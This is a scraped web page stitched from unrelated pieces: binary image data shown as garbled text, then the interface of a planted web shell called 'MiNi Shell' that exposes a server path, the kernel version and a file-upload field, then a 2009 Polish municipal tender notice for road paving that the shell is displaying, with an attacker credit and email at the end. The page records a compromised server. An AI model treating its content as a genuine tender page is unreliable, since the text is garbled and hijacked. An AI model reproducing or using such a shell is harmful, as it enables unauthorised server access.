JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/220232-N-2009.html

<p class="kh_header"><b>Kamionka: Wykonanie nawierzchni asfaltowej na drodze gminnej nr 103259 L Syry-Amelin w gminie Kamionka</b><br>
<b>Numer ogłoszenia: 220232 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Kamionce , ul. Lubartowska 1, 21-132 Kamionka, woj. lubelskie, tel. 081 8527039, faks 081 8527058.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kamionka.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie nawierzchni asfaltowej na drodze gminnej nr 103259 L Syry-Amelin w gminie Kamionka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie nawierzchni asfaltowej na drodze gminnej Syry -Amelin od km 0+936 do km 2+063..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane  jest  wniesienie  wadium przetargowego  w  kwocie  15 000,00  zł  
      (słownie: piętnaście tysięcy złotych).

1. Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia 23 lipca  2009 r. do godz. 10:00. 

2 Wadium może  być wnoszone w jednej lub kilku następujących formach : 
a)	pieniądzu; 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo
       - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c)	gwarancjach bankowych, 
d)	gwarancjach ubezpieczeniowych,  
e)	poręczeniach  udzielanych  przez  podmioty,  o  których  mowa  w  art.  6b  ust.5 
      pkt  2 ustawy  z  dnia  9  listopada  2000  r.  o  utworzeniu  Polskiej  Agencji 
      Rozwoju Przedsiębiorczości ( Dz. U.  Nr 109, poz. 1158 z późn. zm. ). 

3 Wadium wnoszone w pieniądzu należy wpłacić na konto Zamawiającego w : 
   PBS Lubartów Oddział w Kamionce 08 8707 1029 0300 0459 2003 0008
    Dowód wpłaty należy dołączyć do oferty. 

4 W  przypadku  wnoszenia  wadium w  pozostałych  dopuszczalnych  formach 
      określonych  w punkcie 9.3 SIWZ, oryginały dokumentów należy dołączyć do oferty.
 
5. Zamawiający zwróci niezwłocznie wadium, jeżeli: 
a) upłynął termin związania ofertą, 
b) zawarto  umowę  w  sprawie  zamówienia  publicznego  i  wniesiono zabezpieczenie 
 należytego wykonania tej umowy, 
c) zamawiający  unieważnił  postępowanie  o  udzielenie  zamówienia,  a  protesty  
    zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
 
6. Jeżeli  wadium wniesiono  w  pieniądzu,  Zamawiający  zwraca  je  wraz  z  odsetkami wynikającym z  umowy  rachunku  bankowego,  na  którym  było  ono  przechowywane, 
pomniejszonymi  o  koszty  prowadzenia  rachunku  bankowego  oraz  prowizji bankowej  za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
 
7. Zamawiający  zatrzymuje  wadium wraz  z  odsetkami,  jeżeli  Wykonawca,  którego  oferta została wybrana: 
a)	odmówił  podpisania  umowy  w  sprawie  zamówienia  publicznego  na  warunkach określonych  ofercie. 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c)	zawarcie  umowy  w  sprawie  zamówienia  publicznego  stało  się  niemożliwe  z  przyczyn leżących  po  stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Udział w postępowaniu mogą wziąć wykonawcy spełniający warunki określone w art.
        22 ust. 1 ustawy p.z.p., którzy : 
1.1. zrealizowali  w  okresie  ostatnich  pięciu  lat  przed  dniem wszczęcia 
          postępowania,  a jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w  tym okresie  co  najmniej  2 roboty odpowiadające swoim rodzajem i wartością 
          robotom stanowiącym przedmiot zamówienia.  Za  roboty  budowlane 
         odpowiadające rodzajem i  wartością  robotom stanowiącym przedmiot
         zamówienia rozumie się 2 roboty budowlane polegające na wykonaniu 
         nawierzchni asfaltowej na drodze o wartości łącznej min. 1 000 000 zł; 
1.2. dysponują  odpowiednio  wykwalifikowanym personelem w  celu  obsadzenia 
stanowiska kierownika robót z uprawnieniami budowlanymi : 
1.2.1.	o specjalności drogowej lub odpowiadającymi im ważnymi                uprawnieniami budowlanymi, które zostały wydane na podstawie
            	wcześniej obowiązujących przepisów - 1 osoba; 
1.3. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej
          działalności gospodarczej. 

                          2. Ocena  spełniania  warunków  określonych  w  pkt  1.1.  siwz  zostanie   przeprowadzona  na zasadzie  spełnia  /  nie  spełnia  w  oparciu  o  złożone 
         przez wykonawcę  oświadczenia  i dokumenty wymienione w pkt 6 s.i.w.z. 

3.  Wykonawcy nie spełniający warunków określonych w ustawie prawo zamówień
        publicznych oraz w niniejszej specyfikacji zostaną wykluczeni z postępowania. 

4.  W  przypadku  wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia warunki określone w art. 22 ust. 1 pkt 4 ustawy p.z.p. muszą być spełnione odrębnie  przez każdego z  wykonawców  występujących  wspólnie,  natomiast  w  przypadku  pozostałych  warunków szczegółowych  (  pkt  5.1.1.  -  5.1.3.  s.i.w.z.)  wykonawcy występujący  wspólnie  muszą wykazać, że łącznie spełniają te warunki. 

5. Możliwość zatrudnienia podwykonawców. 
5.1.Wykonawca nie może zlecić całości prac objętych zamówieniem
           podwykonawcom. 
5.2. W przypadku przewidywanego przez wykonawcę zatrudnienia podwykonawców należy w ofercie podać jaki zakres przedmiotu zamówienia  będzie  realizował wykonawca, a jaki zakres podwykonawcy.  
5.3.  Do  warunków  zatrudnienia  podwykonawcy  stosuje  się  przepis  art.  6471kc oraz zasady wymienione w punktach następnych. 
5.4.  Zlecenie części robót podwykonawcom nie zmienia zobowiązań wykonawcy
           wobec zamawiającego za wykonanie tej części robót. Wykonawca jest
           odpowiedzialny za działania,  uchybienia  i  zaniedbania  podwykonawców  i
           ich  pracowników  w  takim samym stopniu jakby to były działania, uchybienia  i zaniedbania jego lub jego pracowników.
5.5. Warunkiem niezbędnym do uzyskania zgody zamawiającego na zawarcie   
          umowy pomiędzy wykonawcą a podwykonawcą będzie przedstawienie
          zamawiającemu w terminie 14 dni przed planowanym terminem podjęcia robót przez podwykonawcę umowy pomiędzy wykonawcą a podwykonawcą lub jej
          projektu.            
  5.6. Do zawarcia umowy przez podwykonawcę z następnym podwykonawcą wymagana jest zgoda zamawiającego i wykonawcy.
     5.7. Umowy, o których mowa powyżej wymagają formy pisemnej pod rygorem
                                               nieważności.
  5.8. Zamawiający nie wyrazi zgody na zawarcie umowy z podwykonawcą, której 
            treść jest sprzeczna z treścią umowy zawartej z wykonawcą.
 5.9. W przypadku zawarcia umowy z podwykonawca lub podwykonawcy z dalszym
        podwykonawcą, zmiany umowy lub zatrudnienia nowego podwykonawcy,   
         zmiany warunków umowy z podwykonawcą z naruszeniem zasad, o których 
          mowa powyżej zamawiający jest zwolniony z odpowiedzialności wynikającej  z  art. 6471kc.
     5.10. W sytuacji określonej w punkcie 5.9. zamawiającemu przysługują  
       uprawnienia w postaci wstrzymania płatności należności z tytułu realizacji 
        umowy przez wykonawcę do czasu dostosowania warunków umów do  
         ustaleń określonych w tej części s.i.w.z.
       5.11. Szczegółowe zasady wystawiania faktur i rozliczeń określa wzór umowy
         stanowiący załącznik nr 3 do s.i.w.z.. Zasady te stosuje się odpowiednio do 
        umów podwykonawców z kolejnymi podwykonawcami.  
      5.12. Wykonawcy nie przysługuje prawo do przedłużenia terminu wykonania  
       przedmiotu umowy z powodu okoliczności wstrzymania płatności należności  
        przez zamawiającego z powodów wymienionych w pkt 5.10. oraz  
      umowach, o których mowa w pkt 5.11.
      5.13. Niezastosowanie się wykonawcy do wymogów wynikających z zapisów 
      z pkt  5. upoważnia zamawiającego do podjęcia wszelkich niezbędnych 
       kroków w celu wyegzekwowania od wykonawcy ustaleń niniejszej części
       s.i.w.z., aż do odstąpienia od umowy z wykonawca ( z winy wykonawcy) 
       włącznie.
       5.14. Jeżeli wykonawca nie deklaruje w ofercie zatrudnienia podwykonawców,
        zamawiający przyjmuje, że przedmiot zamówienia zostanie wykonany
         samodzielnie przez wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków, o których mowa w pkt 5. siwz do oferty należy  dołączyć :
1.1. oświadczenia zgodnego z art. 22 ust 1 ustawy p.z.p. wykonawcy o spełnianiu
     warunków udziału w postępowaniu - wzór formularza oświadczenia stanowi
     załącznik nr 2 do s.i.w.z.;
     1.2. aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenia  o  wpisie  do ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają   wpisu  do rejestru  lub  zgłoszenia  do  ewidencji  działalności  gospodarczej, wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
1.3.	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz  
          właściwego oddziału  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy  
          Rolniczego  Ubezpieczenia Społecznego  potwierdzające  odpowiednio,  że  
          wykonawca  nie  zalega  z  opłacaniem podatków,  opłat  oraz  składek  na  
          ubezpieczenie  zdrowotne  i  społeczne,  lub zaświadczenia,  że  uzyskał
          przewidziane  prawem zwolnienie,  odroczenie  lub rozłożenie na raty zaległych  płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu  -  wystawionych  nie  wcześniej  niż  3  miesiące  przed  upływem terminu 
          składania ofert 
1.4.	 polisa,  a  w  przypadku  jej  braku  inny  dokument  potwierdzający,  że 
         wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
         prowadzonej działalności, 
1.5.	dokumenty  stwierdzające,  że  osoba  przewidziana  na  stanowisko  kierownika robót, posiada wymagane uprawnienia : 
 1.5.1. decyzja stwierdzająca posiadanie uprawnień budowlanych o 
         specjalności drogowej; 
    1.5.2. aktualne  zaświadczenia  o  wpisie  na  listę  właściwej  izby  samorządu 
zawodowego; 
1.6. wykaz  osób,  którymi  dysponuje  lub  będzie  dysponował  wykonawca  i  które będą uczestniczyć  w  wykonywaniu  zamówienia,  wraz  z  informacjami  na  
          temat  ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności-- wg załącznika nr 4 do s.i.w.z.;
 1.7. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do 
     wykonania zamówienia, jeżeli w wykazie osób, które będą uczestniczyć w
     wykonaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował,
     1.8. wykaz  wykonanych  w  okresie  ostatnich  5  lat  robót  budowlanych  przed  dniem wszczęcia  postępowania  o  udzielenie  zamówienia,  a  jeżeli  okres   
prowadzenia działalności  jest  krótszy  -  w  tym okresie,  odpowiadających  
 swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot
   zamówienia, z podaniem ich wartości  oraz  daty  i  miejsca  wykonania  z  
    załączeniem dokumentów  (referencji  lub innych) potwierdzających, że roboty te wykonane zostały należycie - wg załącznika nr 5 do s.i.w.z; 

2.  Dokumenty,  o  których  mowa  w  pkt  1.  należy  przedstawić  w  formie  oryginału   
        albo kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.  

3. W  przypadku  wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia   
       każdy  z wykonawców z osobna musi przedstawić oświadczenie w zakresie 
       dotyczącym art. 22 ust. 1  (pkt  6.1.1.  s.i.w.z.)  i  dokumenty  wymienione  
       w  pkt 1.2.  W  takim przypadku  muszą  oni także  ustanowić  pełnomocnika  do  reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania  w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  Pełnomocnictwo musi być załączone do oferty w formie oryginału lub 
       notarialnie potwierdzonej kopi. Jeżeli oferta wykonawców, wspólnie ubiegających się o   udzielenia  zamówienia,  zostanie  wybrana, zamawiający  żąda  przed  zawarciem  umowy  w sprawie  zamówienia publicznego,  umowy  regulującej  współpracę  tych  
       wykonawców, zgodnie z art. 23 p.z.p..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kamionka.lubelskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 21-132 Kamionka
ul. Lubartowska 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2009 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Kamionce ( pokój nr 8)
21-132 Kamionka 
ul. Lubartowska 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com